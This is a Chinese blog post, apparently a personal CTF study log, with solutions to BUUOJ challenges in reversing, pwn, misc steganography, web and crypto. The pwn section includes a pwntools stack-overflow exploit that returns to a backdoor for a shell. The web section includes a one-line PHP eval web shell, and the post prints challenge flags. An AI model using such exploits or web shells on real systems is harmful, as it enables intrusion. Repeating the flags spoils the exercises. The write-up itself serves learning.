2.7学习记录

re

[WUSTCTF2020]Cr0ssfun

得到附件先查壳在这里插入图片描述无壳elf64位文件,放进ida查看主调函数在这里插入图片描述往下追踪,发现7部分相似的结构,给的数字看上去像是ASCII码,对照码表把7部分串联起来在这里插入图片描述得到:wctf2020{cpp_@nd_r3verse_@re_fun}

pwn

rip

先查壳在这里插入图片描述发现没有保护,64位elf文件,放ida里看看在这里插入图片描述发现后门函数,在主调函数处发现gets函数,存在栈溢出在这里插入图片描述控制程序返回到0x40201B,就可以得到系统的shell了
exp

from pwn import  *  #调用pwntools库

r = remote('node3.buuoj.cn',27542)     #远程连接

offset = 0xF + 8    #偏移量
payload = offset * 'a' + p64(0x40201B)  #漏洞利用

r.sendline(payload)		#发送漏洞
r.interactive()		#远程交互

misc

LSB

这题题目是校徽,根据提示猜测是lsb隐写
在这里插入图片描述采用stegsolve工具在这里插入图片描述调整最低位宽,之后点击Save Bin保存文件,发现是个二维码,用cqr扫描即可

web

[极客大挑战 2019]Knife

在这里插入图片描述根据提示构造木马

/?<?php eval($_POST["Syc"]);?>

之后用蚁剑连接即可在这里插入图片描述找到flag了在这里插入图片描述

crypto

Alice与Bob

题目描述很有意思:密码学历史中,有两位知名的杰出人物,Alice和Bob。他们的爱情经过置换和轮加密也难以混淆,即使是没有身份认证也可以知根知底。就像在数学王国中的素数一样,孤傲又热情。下面是一个大整数:98554799767,请分解为两个素数,分解后,小的放前面,大的放后面,合成一个新的数字,进行md5的32位小写哈希,提交答案。
用在线工具分解在这里插入图片描述安装题目要求排列一下即可,得到flag{d450209323a847c8d01c6be47c81811a}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值